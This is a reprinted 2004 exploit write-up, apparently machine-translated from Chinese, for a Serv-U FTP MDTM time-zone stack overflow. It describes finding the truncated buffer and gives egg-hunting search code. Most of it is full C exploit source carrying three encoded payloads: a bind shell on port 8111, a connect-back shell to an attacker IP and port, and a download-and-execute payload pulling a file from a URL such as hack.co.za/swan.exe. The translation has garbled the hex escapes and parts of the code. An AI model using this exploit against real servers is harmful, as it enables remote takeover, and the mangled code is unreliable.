Serv-U MDTM TIME ZONE EXPLOIT
Create time: 2004-02-27
Article properties: reprint
Article submission:
Velvet (ZodiacSoft_AT_HOTMAIL.COM)
Forum login name: Swan
Submit email address: ????
Submit QQ number: ????
Copyright: Article is China Safety Net
Http://www.safechina.net and the author together, please indicate the source! !
Title: Serv-U MDTM Time Zone Exploit
I used SERV-U 5.0 to test, first constructed a long time zone, and found that there is no reaction, after shortening the length of time zone, it seems that the appearance of the first space cannot be triggered. I guess the length of the order, at least, it is truncated, if the position of the first space appears too much, SERV-U though is to query a long file modification date, and overflow will not trigger it. .
So I came back again to build an Exploit's shelf to be triggered string. After determining the RET point with a routine method, connect to the Serv-U daemon with ollydbg to see what happens when exception handling. The result is the same as the imagination, track the Call EBX step by step, then the NOP NOP JMP 4 to the regular method should be the place where shellcode is, I carefully count the contents of the current EIP location and the original string sent by the transmitted The same number of bytes seems to be connected in front of a total of 294 bytes, no doubt, sending data is truncated.
At this time, the first reaction is to find Tiny Shellcode immediately, but unfortunately, it is really not found. I turned over the article of Eyas WS_FTP, I feel very like, but that can have 512 bytes of free time, no matter how, 294 bytes seem to be less. At this time, it is about 11 o'clock. I plan to go back to sleep first, because I have seen the animation of a day, the brain bag is the disgical face of Scar (SCAR?), How to write a concentration.
When I came over the next day, I would like to try to find the original buffer in memory. This time I added SWAN as a tag after a long MTDM command. When I was trigger, I searched it, and I found the original data near EDI, and it seems to have several copies. At this time, the register EBX / ESI / EDI / EBP / EBP / EBP / EBP / EBP / ESP is almost nearly 11xxxxx. From these starts, you should find the original data that has not been processed, I think this Exploit should be completed immediately.
My idea is to determine a tag as a integrity, such as the last "SWAN", then search forward, and finally jump over the past. In order to ensure the security trigger of overflow, I put the search for Search Code in the time zone, and put the real shellcode in the file name. With a saying, here is a SHELLCODE that meets the name of the file name, so that this problem has been solved when Site Chmod, which can be used directly.
Search code is still a bit considered. If it is perfect, it should be dynamically positioned at the current position, take over abnormal processing, using parity checks to determine whether the original buffer is complete. But more and more problems, I am a lazy person, don't do these things, don't want my life, simply do a horse to tiger and tiger will have passed. In order to be universal, the RET address is not 0x7ffa4a1b with Call EBX (this thing is not under XP), but the POP / POP / RET address 0x7FFA1571 given in Lion on Site Chmod. This is said to be able to even get Win2k3, I have no machine to test, only look at the English version of XP and Chinese version of 2K, it is indeed available. However, EDI is changed with this, plus EBX after the exception handling of XP, EBX is 0x00000000, and I start searching down from the ESP, I can find a Win2K and a WinXP can be found. Don't say more nonsense, you will know if you follow it. Search code is this:
// "/ xcc" // int3; for test :-))
"/ x8b / xdc" // Mov EBX, ESP; "POP EBX" is Also OK
"/ xb8 / x52 / x57 / x41 / x4e" // Mov Eax, 4e415753h
"/ x40" // inchex; EQ "Swan" now
"/ x43" // inco
"/ x39 / x03" // CMP [EBX], EAX
"/ x75 / xfb" // jne -5; Search "SWAN"
"/ xb8 / x90 / x90 / x90 / x90" // Mov Eax, 90909090h
// "/ xcc" // int3; for test
"/ x4b" // DEC EBX
"/ x39 / x03" // CMP [EBX], EAX
"/ x75 / xfb" // jne -5; Search NOP / NOP / NOP / NOP
"/ XFF / XD3" // Call EBX
"/ x20 / x20"; //
Probably means to find SWAN, find four new NOPs forward, determine the complete shellcode address, then jump over the execution, the next two spaces (0x20) Meaning, I have already said it ~
A complete exploit is like this, don't write permissions, you can log in. I have not tested several machines (I used three plus a virtual machine), I don't know if there will be no other undisputed problems - after all, I am a pure black box, a guess, a dock disassembly Didn't look at it. There is also a word, the method of SERV-U 5.0 is simple, but this method has an effect on things starting from 3.x, if you think the RET address is not cool, please change your own. This is valid for the Chinese version of 2K / XP / 2K3. / *
Serv-U Allows A MDTM Command That Less Than 294 Bytes, It is to Short to Exploit.
However, We Could Send A MDTM Command As Long As We wish, and we can easily Find Our
Raw buffer in the memory. To be brief, you can find this near [edi] When overflow
Happened. So Search from The Edi, And You CAN Exploit IT.
My Way To Exploit this Could Be Described as Follow:
---- -------------------- -------- ------ - -------
| MDTM | Long Buffer with ' ' | buffer1 |
---- -------------------- -------- ------ - -------
Buffer1:
--------------------------------- ------
| NOP NOP JMP 4 | AddR of "Call EBX" | Short search code |
--------------------------------- ------
Buffer2: (as the filename)
---------------------------------
| FLAG 0x90909090 | Real shellcode | flag 'swan' |
---------------------------------
THE REAL SHELLCODE MUST BE A Valid FileName, See The "Site Chmod Exploit" to Get
More information about how to make the shellcode valid.
* /
#include
#include
#include
#pragma comment (Lib, "WS2_32")
Void Help (Char * Program)
{
Printf ("================================================ ======== / r / n "); Printf (" Serv-U MDTM Time Zone Stack Overflow Xploit V0.20 Alpha / R / N ");
Printf ("For Serv-U 5.0 and Below Written By Swan @ SEU / R / N");
Printf ("================================================ ========= / r / n / r / n ");
Printf ("USAGE:% s
Printf ("% s
Printf ("% s
Printf ("e.g.:/R/N");
Printf ("% S 127.0.0.1 21 Test Test / R / N", Program);
Printf ("% S 127.0.0.1 21 Test Test
http://hack.co.za/swan.exe/r/n ", program);
Printf ("% S 127.0.0.1 21 Test Test 202.119.9.42 8111 / R / N", Program);
Return;
}
Unsigned char bpsc [] =
// shellcode flag, Necessary!
"/ x90 / x90 / x90 / x90"
// decode code, suppose the ebx is near the encoded shellcode
"/ x90 / x5b / xc3 / xbb / x51 / x50 / x50 / x50 / x4b / x40 / x39 / x18 / x75 / xfb / x40 / x40"
"/ x40 / x90 / x66 / xb9 / x7d / x01 / x80 / x34 / x08 / x99 / xe2 / xfa / x90"
"/ X50 / x50 / x50 / x50"
// encoded shellcode, Binding Port
"/ x70 / x99 / xc3 / xfd / x38 / xa9 / x99 / x99 / x99 / x12 / xd9 / x95 / x12"
"/ XE9 / X85 / X91 / X12 / XD9 / X12 / XEA / XA5 / X12 / XED / X87 / XE1 / X9A"
"/ X6A / X12 / XE7 / XB9 / X9A / X62 / X12 / XD7 / X8D / XAA / X74 / XCF / XCE / XC8 / X12 / XA6"
"/ X9A / X62 / X12 / X6B / XF3 / X97 / XC0 / X6A / X3F / XED / X91 / XC0 / XC6 / X1A / X5E / X9D"
"/ xdc / x7b / x70 / xc0 / xc6 / xc7 / x12 / x54 / x12 / xdf / xbd / x9a / x5a / x48 / x78 / x9a"
"/ X58 / XAA / X50 / XDF / X1 / X9A / X5A / X58 / X78 / X9B / X9A / X58"
"/ X12 / X99 / X9A / X5A / X12 / X63 / X12 / X6E / X1A / X5F / X97 / X12 / X49 / XF3 / X9A / XC0"
"/ x71 / x1e / x99 / x99 / x99 / x1a / x5f / x94 / xcb / xcf / x66 / xce / x65 / xc3 / x12 / x41"
"/ Xf3 / X9C / XC0 / X71 / XED / X99 / X99 / X99 / XC9 / XC9 / XC9 / XC9 / XF3 / X98 / XF3 / X9B"
"/ X66 / XCE / X75 / X12 / X41 / X5E / X9E / X9B / X99"
"/ x86 / x36" // <== port xor 0x9999, Default IS 8111
"/ XAA / X59 / X10 / XDE / X9D"
"/ XF3 / X89 / XCE / XCA / X66 / XCE / X69 / XF3 / X98 / XCA / X66 / XCE / X6D / XC9 / XC9 / XCA"
"/ x66 / xcE / x61 / x12 / x49 / x1a / x75 / xdd / x12 / x6d / xaa / x59 / xf3 / x89 / xc0 / x10"
"/ x9d / x17 / x7b / x62 / x10 / xcf / xa1 / x10 / xcf / xa5 / x10 / xcf / xd9 / xff / x5e / xdf"
"/ xb5 / x98 / x98 / x14 / xde / x89 / xc9 / xcf / xaa / x50 / xc8 / xc8 / xc8 / xf3 / x98 / xc8"
"/ xc8 / x5e / xde / xa5 / xfa / xf4 / XFD / X99 / X14 / XDE / XA5 / XC9 / XC8 / X66 / XCE / X79"
"/ XCB / X66 / XCE / X65 / XCA / X66 / XCE / X65 / XC9 / X66 / XCE / X7D / XAA / X59 / X35 / X1C"
"/ X59 / XEC / X60 / XC8 / XCB / XCF / XCA / X66 / X4B / XC3 / XC0 / X32 / X7B / X77 / XAA / X59"
"/ x5a / x71 / x76 / x67 / x66 / x66 / xde / xfc / xed / xc9 / xeb / xf6 / xfa / xd8 / xfd / xfd"
"/ XEB / XFC / XEA / XEA / X99 / XDA / XEB / XFC / XF8 / XED / XFC / XC9 / XEB / XF6 / XFA / XFC"
"/ XEA / XEA / XD8 / X99 / XDC / XE1 / XF0 / XED / XCD / XF1 / XEB / XFC / XF8 / XFD / X99 / XD5"
"/ XF6 / XF8 / XFD / XD5 / XF0 / XFB / XEB / XF8 / XEB / XE0 / XD8 / X99 / XEE / XEA / XAB / XC6"
"/ XAA / XAb / X99 / XCE / XCA / XD8 / XCA / XF6 / XFA / XF2 / XFC / XED / XD8 / X99 / XFB / XF0"
"/ XF7 / XFD / X99 / XF5 / XF0 / XEA / XED / XFC / XF7 / X99 / XF8 / XFA / XFA / XFC / XE9 / XED" "/ X99 / XFA / XEA / XEA / XFC / XEA / XF6 / XFA / XF2 / XFC / XED / X99 ";
#define ip_offset 253
#define port_offset 248
Unsigned char CBSC [] =
"/ x90 / x90 / x90 / x90"
"/ x90 / x5b / xc3 / xbb / x51 / x50 / x50 / x50 / x4b / x40 / x39 / x18 / x75 / xfb / x40 / x40"
"/ x40 / x90 / x66 / xb9 / x7d / x01 / x80 / x34 / x08 / x99 / xe2 / xfa / x90"
"/ X50 / x50 / x50 / x50"
// Connect Back, From
http://www.xfocus.net/articles/200307/574.html
"/ x70 / x99 / xc3 / x21 / x95 / x69 / x64 / x12 / x12 / x99 / x12 / xe9 / x85"
"/ x34 / x12 / x41 / x12 / x12 / xa5 / x9a / x6a / x12 / Xef / xe1 / x9a / x6a"
"/ X12 / XE7 / XB9 / X9A / X62 / X12 / XD7 / X8D / XAA / X74 / XCF / XCE / XC8 / X12 / XA6 / X9A"
"/ x62 / x12 / xc0 / x6a / x3f / xd / x91 / xc0 / xc6 / x1a / x5e / x9d / xdc"
"/ x7b / x70 / xc0 / xc6 / xc7 / x12 / x54 / x12 / xdf / xbd / x9a / x5a / x48 / x78 / x9a / x58"
"/ xaa / x50 / x12 / xdf / x85 / x9a / x5a / x58 / x78 / x9b / x9a / x58 / x12"
"/ x99 / x9a / x5a / x12 / x63 / x12 / x6e / x1a / x5f / x97 / x12 / x49 / xf3 / x9a / xc0 / x71"
"/ XE9 / X99 / X99 / X99 / XCB / XCF / X66 / XCE / X65 / XC3 / X12 / X41 / XF3"
"/ X9B / XC0 / X71 / XC4 / X99 / X99 / X99 / X1A / X75 / XDD / X12 / X6D / XF3 / X89 / XC0 / X10"
"/ X9D / X17 / XC9 / XC9 / XC9 / XF3 / X98 / XF3 / X9B / X66 / XCE / X61 / X12"
"/ X41 / X10 / XC7 / XA1 / X10 / XC7 / XA5 / X10 / XC7 / XD9 / XFF / X5E / XDF / XB5 / X98 / X98"
"/ X14 / XDE / X89 / XC9 / XCF / XAA / X59 / XC9 / XC9 / XC9 / XF3 / X98 / XC9 / XC9 / X14 / XCE"
"/ XA5 / X5E / X9B / XFA / XF4 / XFD / X99 / XCB / XC9 / X66 / XCE / X75 / X5E / X9E / X9B / X99"
"/ x9e / x24 / x5e / xde / x9d / x98 / x99 / x99 / x98 / xf3 / x89 / xce / xca / x66 / xce / x65"
"/ XC9 / X66 / XCE / X69 / XAA / X59 / X35 / X1C / X59 / XEC / X60 / XC8 / XCB / XCF / XCA / X66"
"/ x4b / xc3 / xc0 / x32 / x7b / x77 / xaa / x59 / x5a / x71 / x9e / x66 / x66 / x66 / xde / xfc"
"/ XED / XC9 / XEB / XF6 / XFA / XD8 / XFD / XFD / XEB / XFC / XEA / XEA / X99 / XDA / XEB / XFC" "/ XEB / XED / XFC / XC9 / XEB / XF6 / XFA / XFC / XEA / XEA / XD8 / X99 / XDC / XE1 / XF0 / XED "
"/ XC9 / XEB / XF6 / XFA / XFC / XEA / XEA / X99 / XD5 / XF6 / XF8 / XFD / XD5 / XF0 / XFB / XEB"
"/ XF8 / XEB / XEE0 / XD8 / X99 / XEE / XEA / XAB / XC6 / XAA / XAB / X99 / XCE / XCA / XD8 / XCA"
"/ XF6 / XFA / XF2 / XFC / XED / XD8 / X99 / XFA / XF6 / XF7 / XF7 / XFC / XFA / XED / X99"
Unsigned char dehead [] =
"/ x90 / x90 / x90 / x90"
"/ x90 / x5b / xc3 / xbb / x51 / x50 / x50 / x50 / x4b / x40 / x39 / x18 / x75 / xfb / x40 / x40"
"/ x40 / x90 / x66 / xb9 / xf0 / x01 / x80 / x34 / x08 / x99 / xe2 / xfa / x90"
"/ X50 / x50 / x50 / x50"
// Download & EXECUTE, Modified Slightly ...
"/ x70 / x4d / x99 / x99 / x99 / xc3 / x21 / x95 / x69"
"/ x64 / x12 / x12 / x85 / x34 / x12 / xd9 / x91 / x12 / x41 / x12 / xaa / xa5"
"/ X9A / X6A / X12 / XEF / XE1 / X9A / X6A / X12 / XE7 / XB9 / X9A / X62 / X12 / XD7 / X8D / XAA"
"/ X74 / XCF / XCE / XC8 / X12 / Xa6 / X9A / X62 / X12 / X6B / XF3 / X97 / XC0 / X6A / X3F / XED"
"/ x91 / xc0 / xc6 / x1a / x5e / x9d / xdc / x7b / x70 / xc0 / xc6 / xc7 / x12 / x54 / x12 / xdf"
"/ xbd / x9a / x5a / x48 / x78 / x9a / x58 / xaa / x50 / xff / x12 / x91 / x12 / xdf / x85 / x9a"
"/ x5a / x58 / x58 / x12 / x99 / x9a / x5a / x12 / x63 / x12 / x6e / x1a / x5f"
"/ X97 / X12 / XC0 / X71 / XC9 / X99 / X99 / X99 / X1A / X5F / X94 / XCB / XCF"
"/ X66 / XCE / X65 / XC3 / X12 / X41 / XF3 / X98 / XC0 / X71 / XA4 / X99 / X99 / X99 / X1A / X5F"
"/ x8a / xcf / xdf / x19 / xa7 / x19 / xec / x63 / x19 / xaf / x19 / xc7 / x1a / x75 / xb9 / x12"
"/ X45 / XF3 / XB9 / XCA / X66 / XCE / X75 / X5E / X9D / X9A / XC5 / XF8 / XB7 / XFC / X5E / XDD"
"/ X9A / X9D / XE1 / XAA / X59 / XC9 / XC9 / XCA / XCF / XC9 / X66 / XCE / X65"
"/ X12 / X45 / XC9 / XCA / X66 / XCE / X69 / XC9 / X66 / XCE / X6D / XAA / X59 / X35 / X1C / X59"
"/ XEC / X60 / XC8 / XCB / XCF / XCA / X66 / X4B / XC3 / XC0 / X32 / X7B / X77 / XAA / X59 / X5A"
"/ x71 / xbep / xde / xfc / xed / xc9 / xeb / xf6 / xfa / xd8 / xfd / xfd / Xeb" "/ XFC / XEA / XEA / X99 / XDE / XFC / XED / XCA / XE0 / XEA / XED / XFC / XF4 / XDD / XF0 / XEB "
"/ XFC / XFA / XED / XF6 / XEB / XE0 / XD8 / X99 / XCE / XE1 / XFC / XFA / X99"
"/ XDC / XE1 / XF0 / XED / XC9 / XEB / XF6 / XFA / XFC / XEA / XEA / X99 / XD5 / XF6 / XF8 / XFD"
"/ xd5 / xf0 / xfb / xeb / xf8 / x99 / xec / xeb / xf5 / xf4 / xf6 / xf7 / x99"
"/ XCC / XCB / XD5 / XDD / XF6 / XEE / XF7 / XF5 / XF6 / XF8 / XFD / XCD / XF6 / XDF / XF0 / XF5"
"/ xfc / xd8 / x99";
// "
http://127.0.0.1/hello.exe "
// "/ x80";
UNSIGNED CHAR DESC [500] = {0};
Void main (int Argc, char * argv [])
{
Wsadata wsadata;
Socket S;
Struct hostent * he;
Struct sockaddr_in host;
INT ntimeout = 1000;
IF (argc! = 5 && argc! = 6 && argc! = 7)
{
Help (Argv [0]);
Return;
}
IF (argc == 6)
{
// Initialize The Download & Execute Shellcode
// shellcode head ((URL 0x80) xor 0x99) <== all for damned ':'
MEMSET (DESC, 0, 500);
Memcpy (desc, dehead, sizeof (dehead));
CHAR URL [255];
STRCPY (URL, Argv [5]);
STRCAT (CHAR *) URL, "/ x80");
For (unsigned int j = 0; j URL [J] = URL [J] ^ '/ X99'; STRCAT ((Char *) DESC, URL); } IF (argc == 7) { Unsigned short port = HTONS (ATOI (ARGV [6])) ^ (u_short) 0x9999; Unsigned long ip = inet_addr (argv [5]) ^ 0x99999999; Memcpy (& CBSC [Port_offset], & Port, 2); Memcpy (& CBSC [IP_OFFSET], & IP, 4); } IF (WSAStartup (0x0101, & WSADATA)! = 0) { Printf ("ERROR Starting Winsock .."); Return; } IF ((he = gethostByname) == 0) { Printf ("Failed Resolving '% S'", Argv [1]); Return; } Host.sin_port = htons (ATOI (Argv [2])); host.sin_family = AF_INET; Host.sin_addr = * (Struct In_ADDR *) HE-> H_ADDR); IF ((S = Socket (AF_INET, SOCK_STREAM, 0) == -1) { Printf ("Failed Creating Socket"); Return; } IF ((S., Struct SockAddr *) & Host, SizeOf (Host)) == -1) { Printf ("Failed Connecting to Host / R / N"); Return; } Setsockopt (S, SOL_Socket, SO_RCVTIMEO, (CHAR *) & ntimeout, sizeof (ntimeout)); Char buff [50000] = {0}; MEMSET (BUFF, 0, SIZEOF (BUFF)); Char szuser [255] = {0}; STRCPY (SZUser, "User"); STRCAT (SZUSER, Argv [3]); STRCAT (SZUSER, "/ R / N"); Char szpass [255] = {0}; STRCPY (Szpass, "Pass"); STRCAT (SZPASS, Argv [4]); STRCAT (SZPASS, "/ R / N"); INT BREAD = RECV (S, Buff, Sizeof (BUFF), 0); IF (BREAD == -1) { CloseSocket (s); Printf ("No Response ... Perhaps it has been hacked! / r / n"); Return; } Printf (BUFF); // send User Send (S, Szuser, Strlen (Szuser), 0); MEMSET (BUFF, 0, SIZEOF (BUFF)); RECV (S, BUFF, SIZEOF (BUFF), 0); Printf (BUFF); // send pass Send (S, Szpass, Strlen (Szpass), 0); MEMSET (BUFF, 0, SIZEOF (BUFF)); RECV (S, BUFF, SIZEOF (BUFF), 0); Printf (BUFF); IF (buff [0] == '5') { CloseSocket (s); Printf ("Authentication Failed! / R / N"); Return; } Char XPloit [1500] = {0}; CHAR head [] = "MDTM 19811102172800 IN_MY_DREAM_I_ALWAYS_SEE_YOU_SOAR_ABOVE_THE_SKY"; / ************************************************** *********************** Search The "Swan" to Ensure the Buffer Is Intact, Then Search Backwards TO Find the head of shellcode. *********************************************************** ********************** / Char search [] = // "/ xcc" // int3 (for test) "/ x8b / xdc" // MOV EBX, ESP "/ xb8 / x52 / x57 / x41 / x4e" // Mov Eax, 4e415753h "/ x40" // incap "/ x43" // inco "/ x39 / x03" // CMP [EBX], EAX "/ x75 / xfb" // jne -5 "/ xb8 / x90 / x90 / x90 / x90" // Mov Eax, 90909090h // "/ xcc" // int3 (for test) "/ x4b" // DEC EBX "/ x39 / x03" // CMP [EBX], EAX "/ x75 / xfb" // jne -5 "/ XFF / XD3" // Call EBX "/ x20 / x20"; // MEMSET (XPLOIT, 0, SIZEOF (XPLOIT); STRCPY (XPLOIT, HEAD); * (INT *) (XPLOIT STRLEN (HEAD) 0)) = 0x04eb9090; // NOP NOP JMP 4 * (INT *) (XPLOIT STRLEN (HEAD) 4)) = 0x7ffa1571; // 0x7ffa4a1b; // jmp ebx // Copy the search code Memcpy (XPLOIT STRLEN (HEAD) 8, Search, SizeOf (Search); // Copy the shellcode IF (argc == 5) Memcpy (XPLOIT STRLEN (HEAD) 8 Strlen (Search), BPSC, SIZEOF (BPSC)); IF (argc == 6) Memcpy (XPLOIT STRLEN (HEAD) 8 Strlen (Search), DESC, STRLEN ((char *) DESC); IF (argc == 7) Memcpy (XPLOIT STRLEN (HEAD) 8 Strlen (Search), CBSC, SIZEOF (CBSC)); // Copy the flag. Swan? it's me ~ STRCAT (XPLOIT, "SWAN / R / N"); //printf (xploit); Send (S, XPLOIT, STRLEN (XPLOIT), 0); MEMSET (BUFF, 0, SIZEOF (BUFF)); Bread = RECV (S, Buff, Sizeof (BUFF), 0); IF (BREAD == -1) { CloseSocket (s); IF (argc == 5) Printf ("Success! Try Connect Port 8111 TO GET YOUR ... / R / N"); if (argc == 6) Printf ("Success! Host Has Download and Execute The Program ... / r / n"); IF (argc == 7) Printf ("Success! See your nc.exe ... / r / n"); Return; } Printf ("Failed ... Perhaps It Has Been Patch! / R / N"); CloseSocket (s); Return; }
